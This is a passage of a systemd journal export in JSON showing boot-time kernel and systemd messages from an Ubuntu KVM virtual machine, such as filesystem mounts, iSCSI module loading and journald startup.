"1615280780014358", "__MONOTONIC_TIMESTAMP" : "5731247", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3908006", "MESSAGE" : "Btrfs loaded, crc32c=crc32c-intel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cd;b=e2b08827b5804427b422c10c84f1567e;m=5773bd;t=5bd16dd1af324;x=967a662793c4f2ca", "__REALTIME_TIMESTAMP" : "1615280780014372", "__MONOTONIC_TIMESTAMP" : "5731261", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "3937225", "MESSAGE" : "random: fast init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ce;b=e2b08827b5804427b422c10c84f1567e;m=5773c9;t=5bd16dd1af330;x=69fd3a294d658dcf", "__REALTIME_TIMESTAMP" : "1615280780014384", "__MONOTONIC_TIMESTAMP" : "5731273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "4003689", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cf;b=e2b08827b5804427b422c10c84f1567e;m=5773d4;t=5bd16dd1af33c;x=fd3648774e170cb5", "__REALTIME_TIMESTAMP" : "1615280780014396", "__MONOTONIC_TIMESTAMP" : "5731284", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "4007486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d0;b=e2b08827b5804427b422c10c84f1567e;m=5773f1;t=5bd16dd1af359;x=e99a633f94b1be11", "__REALTIME_TIMESTAMP" : "1615280780014425", "__MONOTONIC_TIMESTAMP" : "5731313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", "_SOURCE_MONOTONIC_TIMESTAMP" : "4011196" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d1;b=e2b08827b5804427b422c10c84f1567e;m=577400;t=5bd16dd1af367;x=f558cf2ce7cf1e96", "__REALTIME_TIMESTAMP" : "1615280780014439", "__MONOTONIC_TIMESTAMP" : "5731328", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4095523", "MESSAGE" : "EXT4-fs (vda1): mounted filesystem with ordered data mode. 
Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d2;b=e2b08827b5804427b422c10c84f1567e;m=57740c;t=5bd16dd1af374;x=9b3dda8076202fc4", "__REALTIME_TIMESTAMP" : "1615280780014452", "__MONOTONIC_TIMESTAMP" : "5731340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4792547", "MESSAGE" : "ip_tables: (C) 2000-2006 Netfilter Core Team" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d3;b=e2b08827b5804427b422c10c84f1567e;m=57741c;t=5bd16dd1af383;x=1cbee677ef6ff7e8", "__REALTIME_TIMESTAMP" : "1615280780014467", "__MONOTONIC_TIMESTAMP" : "5731356", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4828132", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "MESSAGE" : "systemd 237 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d4;b=e2b08827b5804427b422c10c84f1567e;m=57742b;t=5bd16dd1af393;x=61db57ed35ef3db6", "__REALTIME_TIMESTAMP" : "1615280780014483", "__MONOTONIC_TIMESTAMP" : "5731371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4838029", "MESSAGE" : "Detected virtualization kvm." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d5;b=e2b08827b5804427b422c10c84f1567e;m=57743b;t=5bd16dd1af3a3;x=6cad4666b4b66f5a", "__REALTIME_TIMESTAMP" : "1615280780014499", "__MONOTONIC_TIMESTAMP" : "5731387", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4840668", "MESSAGE" : "Detected architecture x86-64." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d6;b=e2b08827b5804427b422c10c84f1567e;m=577448;t=5bd16dd1af3b0;x=7d956334ef22c29d", "__REALTIME_TIMESTAMP" : "1615280780014512", "__MONOTONIC_TIMESTAMP" : "5731400", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4855210", "MESSAGE" : "Set hostname to ." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d7;b=e2b08827b5804427b422c10c84f1567e;m=577455;t=5bd16dd1af3bc;x=cc15926571e6ef3b", "__REALTIME_TIMESTAMP" : "1615280780014524", "__MONOTONIC_TIMESTAMP" : "5731413", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4870328", "MESSAGE" : "Initializing machine ID from KVM UUID." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d8;b=e2b08827b5804427b422c10c84f1567e;m=577461;t=5bd16dd1af3c9;x=601f89e0a8d6d00d", "__REALTIME_TIMESTAMP" : "1615280780014537", "__MONOTONIC_TIMESTAMP" : "5731425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4874166", "MESSAGE" : "Installed transient /etc/machine-id file." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d9;b=e2b08827b5804427b422c10c84f1567e;m=57746f;t=5bd16dd1af3d6;x=17ecf4b5c6f614fc", "__REALTIME_TIMESTAMP" : "1615280780014550", "__MONOTONIC_TIMESTAMP" : "5731439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5338460", "MESSAGE" : "Reached target Swap." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1da;b=e2b08827b5804427b422c10c84f1567e;m=57747b;t=5bd16dd1af3e3;x=c8c921c7a0c85d5a", "__REALTIME_TIMESTAMP" : "1615280780014563", "__MONOTONIC_TIMESTAMP" : "5731451", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5343107", "MESSAGE" : "Reached target User and Group Name Lookups." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1db;b=e2b08827b5804427b422c10c84f1567e;m=577487;t=5bd16dd1af3ef;x=f8a48c4940b6d242", "__REALTIME_TIMESTAMP" : "1615280780014575", "__MONOTONIC_TIMESTAMP" : "5731463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5349139", "MESSAGE" : "Set up automount Arbitrary Executable File Formats File System Automount Point." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dc;b=e2b08827b5804427b422c10c84f1567e;m=577494;t=5bd16dd1af3fc;x=fc4678ab1b81a329", "__REALTIME_TIMESTAMP" : "1615280780014588", "__MONOTONIC_TIMESTAMP" : "5731476", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5356839", "MESSAGE" : "Created slice User and Session Slice." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dd;b=e2b08827b5804427b422c10c84f1567e;m=5774a1;t=5bd16dd1af408;x=ae62b745ca058a1c", "__REALTIME_TIMESTAMP" : "1615280780014600", "__MONOTONIC_TIMESTAMP" : "5731489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5488210", "MESSAGE" : "Loading iSCSI transport class v2.0-870." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1de;b=e2b08827b5804427b422c10c84f1567e;m=5774b0;t=5bd16dd1af417;x=e7e376182de3d387", "__REALTIME_TIMESTAMP" : "1615280780014615", "__MONOTONIC_TIMESTAMP" : "5731504", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5499236", "MESSAGE" : "EXT4-fs (vda1): re-mounted. Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1df;b=e2b08827b5804427b422c10c84f1567e;m=5774cb;t=5bd16dd1af432;x=4ecfa34b7065c656", "__REALTIME_TIMESTAMP" : "1615280780014642", "__MONOTONIC_TIMESTAMP" : "5731531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5568633", "MESSAGE" : "iscsi: registered transport (tcp)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e0;b=e2b08827b5804427b422c10c84f1567e;m=5774e5;t=5bd16dd1af44d;x=c88a5b30d8b3d7fc", "__REALTIME_TIMESTAMP" : "1615280780014669", "__MONOTONIC_TIMESTAMP" : "5731557", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5685927", "MESSAGE" : "iscsi: registered transport (iser)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e1;b=e2b08827b5804427b422c10c84f1567e;m=5774fc;t=5bd16dd1af463;x=bb4e6f9bf0d1357c", "__REALTIME_TIMESTAMP" : "1615280780014691", "__MONOTONIC_TIMESTAMP" : "5731580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 
"SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "MESSAGE_ID" : "f77379a8490b408bbe5f6940505a777b", "MESSAGE" : "Journal started", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e2;b=e2b08827b5804427b422c10c84f1567e;m=579b80;t=5bd16dd1b1ae7;x=708a9f50f5affdb4", "__REALTIME_TIMESTAMP" : "1615280780024551", "__MONOTONIC_TIMESTAMP" : "5741440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "Runtime journal (/run/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 2.4M, max 19.9M, 17.4M free.", "JOURNAL_NAME" : "Runtime journal", "JOURNAL_PATH" : "/run/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "2613248", "CURRENT_USE_PRETTY" : "2.4M", "MAX_USE" : "20905984", "MAX_USE_PRETTY" : "19.9M", "DISK_KEEP_FREE" : "31358976", "DISK_KEEP_FREE_PRETTY" : "29.9M", "DISK_AVAILABLE" : "206270464", 
"DISK_AVAILABLE_PRETTY" : "196.7M", "LIMIT" : "20905984", "LIMIT_PRETTY" : "19.9M", "AVAILABLE" : "18292736", "AVAILABLE_PRETTY" : "17.4M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e3;b=e2b08827b5804427b422c10c84f1567e;m=57aad6;t=5bd16dd1b2a3e;x=60e7c652e0bd7c0d", "__REALTIME_TIMESTAMP" : "1615280780028478", "__MONOTONIC_TIMESTAMP" : "5745366", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "MESSAGE" : "Inserted module 'iscsi_tcp'", "_TRANSPORT" : "journal", "_PID" : "373", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780028525" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e4;b=e2b08827b5804427b422c10c84f1567e;m=57aed7;t=5bd16dd1b2e3f;x=b97ccb0c58724824", "__REALTIME_TIMESTAMP" : "1615280780029503", "__MONOTONIC_TIMESTAMP" : "5746391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "_TRANSPORT" : "journal", "_PID" : "373", "MESSAGE" : "Inserted module 'ib_iser'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280779979585" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e5;b=e2b08827b5804427b422c10c84f1567e;m=57ced3;t=5bd16dd1b4e3a;x=4b62473704db743c", "__REALTIME_TIMESTAMP" : "1615280780037690", "__MONOTONIC_TIMESTAMP" : "5754579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", 
"_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE" : "Starting Flush Journal to Persistent Storage...", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780029943" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e6;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=1d9ee251b5cd373d", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE" : "Time spent on flushing to /var is 3.314ms for 485 entries." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e7;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=f04395007d153097", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "System journal (/var/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 8.0M, max 200.9M, 192.9M free.", "JOURNAL_NAME" : "System journal", "JOURNAL_PATH" : "/var/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "8388608", "CURRENT_USE_PRETTY" : "8.0M", "MAX_USE" : "210751488", "MAX_USE_PRETTY" : "200.9M", "DISK_KEEP_FREE" : "316125184", "DISK_KEEP_FREE_PRETTY" : "301.4M", "DISK_AVAILABLE" : "1075249152", "DISK_AVAILABLE_PRETTY" : "1.0G", "LIMIT" : "210751488", "LIMIT_PRETTY" : "200.9M", "AVAILABLE" : "202362880", "AVAILABLE_PRETTY" : "192.9M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e8;b=e2b08827b5804427b422c10c84f1567e;m=588647;t=5bd16dd1c05ae;x=85e75afcf7a90cd2", "__REALTIME_TIMESTAMP" : "1615280780084654", "__MONOTONIC_TIMESTAMP" : "5801543", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : 
"unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "MESSAGE" : "Started udev Kernel Device Manager.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "UNIT" : "systemd-udevd.service", "INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780055025" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e9;b=e2b08827b5804427b422c10c84f1567e;m=5887ca;t=5bd16dd1c0731;x=e3fc14ea025d4465", "__REALTIME_TIMESTAMP" : "1615280780085041", "__MONOTONIC_TIMESTAMP" : "5801930", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Apply Kernel Variables.", "UNIT" : "systemd-sysctl.service", "INVOCATION_ID" : "6b6fa8b7e34c4a8a9469dc4e7cc56602", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780061690" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ea;b=e2b08827b5804427b422c10c84f1567e;m=58cff4;t=5bd16dd1c4f5c;x=a385b718ba0d78cb", "__REALTIME_TIMESTAMP" : "1615280780103516", "__MONOTONIC_TIMESTAMP" : "5820404", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Flush Journal to Persistent Storage.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780100979" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1eb;b=e2b08827b5804427b422c10c84f1567e;m=592a7b;t=5bd16dd1ca9e2;x=7bf11fd8fad12c74", "__REALTIME_TIMESTAMP" : "1615280780126690", "__MONOTONIC_TIMESTAMP" : "5843579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 